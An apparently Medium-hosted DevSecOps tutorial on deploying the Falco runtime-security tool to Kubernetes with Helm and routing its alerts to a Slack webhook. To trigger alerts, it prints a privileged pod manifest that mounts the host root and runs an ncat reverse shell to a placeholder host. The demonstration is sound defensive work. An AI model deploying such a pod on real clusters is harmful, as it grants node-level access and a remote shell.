Open in app

Sign in

Write

Sign in

Kubernetes Falco deployment and Slack integration — DevSecOps

Süleyman Kütükoğlu
5 min readDec 9, 2022

--

Today, we will install Falco on our Kubernetes cluster and set up an architecture where we can receive security notifications via Slack.

First of all, what is Falco?

Falco is the open source standard for real-time detection of threats and anomalies across containers, Kubernetes, and cloud services.

You can edit the rules under which Falco will be triggered as you wish. For example, it can detect unexpected Kubernetes suspicious API requests, unexpected access to your applications (such as unexpected opening a terminal to your postgresql operator via kubectl exec /bin/sh/) or operating system-level operations to your worker/master nodes (unexpected file creation under the server’s /etc folder). etc.) you can be notified instantly.

What is Slack?

Slack is seen as a program for team communication compared to other messaging applications. Anyone who has files, announcements or shares in the sector added to the channel can access it.
In this project, we will send the warning we detected with Falco to the Slack channel. This way we can monitor any suspicious activity in our Kubernetes cluster on mobile/web/desktop at any time.

Slack channel creation and configuration

Before we move on to Falco setup, we need to create a Slack channel that Falco can use.

After logging in/registering on Slack, click the “CREATE A NEW WORKSPACE” button from the bar below.

Assign a name to the Workspace and click the “Next” button.

We continue with the “Skip this step” option without inviting anyone to the team for the demo.

After filling the description part, we complete our workspace creation process with the “Next” button.

Then we create a channel to receive Falco notifications.

Now we go to https://api.slack.com and click the “Create an app” button to create an endpoint where Falco can send alerts.

We continue with the “From scratch” option.

After assigning a name to our application, we select the workspace we have just created and click the “Create App” button.

Click on “Incoming Webhooks” on the page

We activate the feature by clicking “Off”.

Click on “Add New Webhook to Workspace”.

We select the channel we created for Falco alerts and click the “Allow” button.

Our endpoint is ready. We will use the Endpoint URL address a little later when installing Falco with helm.

Falco setup

We can quickly set up our Falco through Helm.

Run the following command after replacing the “Webhook URL” with the URL we created in the previous step.

helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update

helm install falco -n falco falcosecurity/falco \
  --set falcosidekick.enabled=true \
  --set falcosidekick.webui.enabled=true \
  --set auditLog.enabled=true \
  --set falco.jsonOutput=true \
  --set falco.fileOutput.enabled=true \
  --create-namespace \
  --set falcosidekick.config.slack.webhookurl="<Webhook URL>"

After running the command, the output of the command “kubectl get pod -n falco” should be as follows.

Falco deployed successfully. Now let’s test if the rules work.

Access to Worker/Master directories

Now I will create a file under the /etc folder of my master1 node and we will get a critical notification on the Slack channel instantly.

After running the command, we received a notification on our Slack channel, including the details of the transactions made at the “Error” level.

Running a malicious application

Now let’s run a malicious POD with unnecessary privileges on our Kubernetes cluster and then examine Falco alerts.

The YAML file of the POD we will run:

apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed-revshell-pod
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed-pod
    image: raesene/ncat
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
  volumes:
  - name: noderoot
    hostPath:
      path: /

After running the POD, dozens of notifications like the one below popped up on the Slack channel.

Even if you are not at your computer, you can receive all notifications with the Slack application that you will install on your phone.

By default, Falco comes with rules that can detect many suspicious activities, but you can create your own rules and have a more secure Kubernetes cluster.

Falco Rules

I hope you enjoyed reading and trying it out.
See you in the next article :)

You can find my other articles by clicking here.

Mail | LinkedIn

Resources:

The Falco Project

Last modified August 8, 2022 Cloud Native Runtime Security The Falco Project is an open source runtime security tool…

falco.org

Developer docs and guides

Guidelines and requirements for App Directory Apps

api.slack.com

Devsecops
Kubernetes
Cloud
Falco
Slack

--

--

Süleyman Kütükoğlu

Written by Süleyman Kütükoğlu

59 Followers

Nephophile, (CKA|CKS|CKAD), https://www.linkedin.com/in/suleyman-kutukoglu/

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams